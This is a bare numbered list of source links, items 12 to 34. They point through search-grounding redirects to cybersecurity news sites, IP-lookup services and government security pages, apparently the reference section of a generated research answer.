12. [gbhackers.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFeerYnVSLwQGUyagxOUbGym1E0wmsSJFAoQt10mTmtaPPu2z4MPq3Y0HsLRCSEPu5tGZ5dtKPUUqcWfS4OMwmSyKyPZ1Rb6CgdFYBNu5mVFgaBqaAzJ0aw8rAPtPGBUva_k6OPnr-orZCeCzGVaA_O3V0KDDocwQ==)
13. [dataplane.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQErxNkEppwlSjsqBKGw_P5D4Zi00rthsgXkEIhKnAzPfQskLfuOuTykrA_MImrQ_Hs8knPt5FOzvFHyKkOLkUOvbPHFGn4fUWfV7vxxBKeO7Kn8RMuleWtOpg==)
14. [plotip.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHiB2RZXJ8yw3XmeOS_u_zuhM06Z7geLPFebJP1fJOhNQn7xmLNGfFRENHpUJZQxtqtCvinSWbda4E3SD4unv0Lh49qJ3r8_Ydl3uNFxa2GdZdqnBm1OIQ=)
15. [ntunhs.net](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGq49RfbNtvfX92YHbEMjQI3WuREb5YNd0vQk_4sQNIeWI3qGYzNfdwI5ft4bqD0_czieeqmxbhu5yox2w4dSOnaVdxvFPG4vyif88iCHRghhZ_GHzxxrQOL2Q6q1z0UQ==)
16. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQESKTJdmo3lEtVyO617VAyKV3TclWpmQeuoSSYfn_rlR1FomyJo473Frr4mQdlsBslyvCwHG8uWPuWZdJWe3hHEKNZLyEck7veNY4ZtKzZBvbeUefnsXIjgw0o=)
17. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF5qrfWn1VSFduaNPttq1q1ATKqfG_yjUlmB9N4GaT5ENIk9gNzpZQLV9o24MwEtzFTa22GG5jsVpI4CVHAb2ctsp9T4_W4SC2dHlEdgv3hgwsAHUXRKR1JFcNI8A==)
18. [socradar.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFUfHPvSo6zNcwhsfvqbu_bB2SZ8FzV0XQitrq2Wds6z-F0RCqsHt_FWcQ9HeYhai-AciK8Z6I4uT2uwbH73-a6LT0wzowsf8AEmylFXwda9f082OYLCb_D-qxrhaBZDhjUv6HotmUg2UR9ceHfcNBWOJrCQNhsXyggPoKevJ8IK6drU-cZ_Xhku7ji3INdfAU=)
19. [thestack.technology](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHrQso54LF4A17HEFHAk5B70BO-ATSac0gMG5HxbzveM3OvLSIn0zw5sQs6ESTxQgW_s3vdYh-tKfwh46Ktrarz-R7n5eYVPF7RhNdpizEkqEXHpbZviwW34Zr9H7t0AkIb5UtKtITpKv-vJQNNmd94SbPRPQ==)
20. [heimdalsecurity.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGnMa1zleng7bFbHRSqRm06-dpfx4CcmgZIFhI18oZ5JG0lY6N_Q4LySRNwkToPRgObQpdQzotMOvy0ZUt_Uk-9Cy_jp6kC6-agMPAhB7wWHdcmjVTE14YmGsZ-Jx5XwAPzd2tjsosw-9JAA16Xc37ma4M8-JPvBmuR57xLy3pFeKQqe6h2nqU=)
21. [aquasec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFY8c2c0dZMdotPV0A69ovGPYEmkEYOm1XmhaHmryac1Vtw1eAaIX24SQdEKwe-Bgu1e3C1J3ybpciII7yfiEmen1VDd93RgcYgKAjQnmsYtDQetkZbMIiVHyG1_sY6qO0fHHQ5n7ifJrNgpR8lpZF7fbEnrURi4KGbN-BfNjqIm50xhVt61nUUh1Xc)
22. [scworld.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFASNtKwBDWB5zHD9VZU0cyZp02ouDIiGLdIM_BD7YgCgUTIfVrDa6kZjRpvjzIkkXbvcKeuvHylYaAnDJytqII8UQsWAWUyNis2OQhzzhQca5ZU0hMxz9PuueQbFPD5CiwVXcifTPymwbRMcKwdPnwjWeR_U3pVjvyKgyAUcM5T9pN6YsKo9UdnL9n-yVpDbyhuAw_6h9KLhY=)
23. [thehackernews.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGa1g0jXMN34Y9nfACwhO-OlgOdqibGQHmJlJjVHE9TeckTsNgFXiHM6iRux64F56c_BDWreF8KYybQbd93jrxSiNz2mKjhxFNpMdR4Sf0dMmpK-DF-OSaAum61CAOxt1VL9XXuNxrnD987Sn8u_-cPEK--pxWwf4eWe2X-B912Xw==)
24. [aquasec.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQFki7BJKdRTesulccRhhYYAjY7Gp6rmtdsNjrFRS44cWcP7P-V_ZBQFA1CbdqGYakKlNxUP9WWaLxZpjUMWeE4N3IX5eC6sbOqEa4-uZNAgKd2ll2c9Kgfs2calvYFXir9ZyhqyU4IRw6TiCS3_Fxh_mNtCAarviFBucXKyjdGhI6WZ8elryTNzDhn4acoF3OLX988Uix0HtY_gI4xFVWsQUfX-b2tn9KIfM-cjWfjTNs4N7Q==)
25. [thehackernews.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGU-LV0Tr32QPXOuVviL01JZzLGxTuJDcxhu9EtF-tKxAuC5Tj6Ux6mZvYWXi0DFi9-UkDch5ZFkP_V4ddujtX8DVa4_SIEQhxjFCYodcgXL5UPNy347M-07wg-CCopMbf40jML2qn14TeQazuMyhIiMt4as0FVUgD2qkzJ4ov_GuqCpDU=)
26. [esecurityplanet.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH1jMX-4MEifzEOjU9sMLcGyzg4Tyc2ldSIE4-dbVWBsGKqk7OtBM-bcLvWn5iNuemqMk1e4I0_BQrydEV8oTs4RIxFbGLxGz2-O1s5Qsa1Ta-MlUBFHxQiEPsxGJPyWjH-BurONfX1wbOX4I8OVSF_KaceiQJYm1fGabUTJXmB)
27. [cyberpress.org](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF6n_3Hh8QWi2LNq2cVm-xaHWnDnyyr3JBHBF8LTS5L1TsDDpWgK3wtCM5RuBhjst2h2O7J-iGwjneK7acY1YBJ5OjZQe9CFVFuN-Z4wULCJWU3dAw-_lB8k8eUOP34ZVf50PNTYpfQ9Xn8_9B_OcdktA3bFLm6QPPxObcFJHggRmMAIA==)
28. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEcQ8dITJ9CvcNvrbeeK5MriM-l-wC0g3suvR35hnF-JiT3HoqctXlhWuUr552ouDzU2jDVsNxy_iG6wqPX6SCnON0z_F5QH_iancgjFKM18tiRicn5aW5RtWtu)
29. [cisa.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQGoFhsrhx8hePVa5gcBZdH9raVFKxxwnmASoctzbrCS73tTyzlZ37R62reY7JQti6qe8XmpTV3shKHFaXthKPqZqIMG-eejrGLi4GEEsDorXpalzpYvuZcCnlvgCAaqynj7umwBLlL8pP4=)
30. [opencve.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHGGg60GtMSPNMIyoH36WjmIsYwCu8M02CR6onqrjU77GJh233dQQIRnIeJq9pdicBAjTmx2l1oPS6GwGpqjDAl28iIJnVuLyJdA0HsE6m9MZk3Quc3FXUakjbXdrmK1_FEKMMy)
31. [ipinfo.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQH2s6Uks33zxTtouYhilegt5ikU5fdRTOKUGwQ-TQ_t5s1hl3Thb7IpGy2arnjJZwmGPuF4ppx9_1rxdvyPPnzuNgXsCQKwGJcfCKkko4rXRnJH6Ijoabg5dzoMhg==)
32. [defense.gov](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQF0jETdS9fJrTGhZheqXhwFTydnq0oBQfSVqpwm5iHkIyUNjk4YagcIHYJ9Vdcui4xjJBnHkJZZFnFSin9WOF1g_Tloq-rKaiKO91KfQxl_h_TuuA0xCTnaliYGpwKjvNm6kJ-i1I7-i3Ase-u6WWN_sJPfVXA2K5LWZ0HTJ6YL23vV4B9ybwuKCB3Zm6K2OV6PKDo4Kalc98FyJ-zvEMa_uCjfhA==)
33. [githubusercontent.com](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQHcLfXKVyV6J44rAjyKLkE4Dl0KllHaCM-OMOJTTwxjgYuU_36I1xgaLZ9kQdqss7S5Zq1b-4XWAzOMxJ8CEuzmxmF0YDZ0rTajwkJ5lGfaBxgZZBLcK0B_6aIkwbaW_XTKeg_s7bQupG-nO8G53B5s1rkrRBBZ9NKi0LuN06GV0s6uOH6g5KLdn3_AAXt18jXZ7oNKf4McrKlo8f_Yt0LzsRmf-QPZ09k=)
34. [ipgeolocation.io](https://vertexaisearch.cloud.google.com/grounding-api-redirect/AUZIYQEZJRiA79px-uTuWa7Bn6MsRS-sZoF4W4dXgF6zupwXuxY5-p93RtcTqxRoRu4oHrOqOau1K5FwswUBSNbuMl_JO04-Xwu2rQKVZJHxdGhOG_yU8q4W_zrx6zLGMW3n-LjTmrYeLgpoV2UFLg==)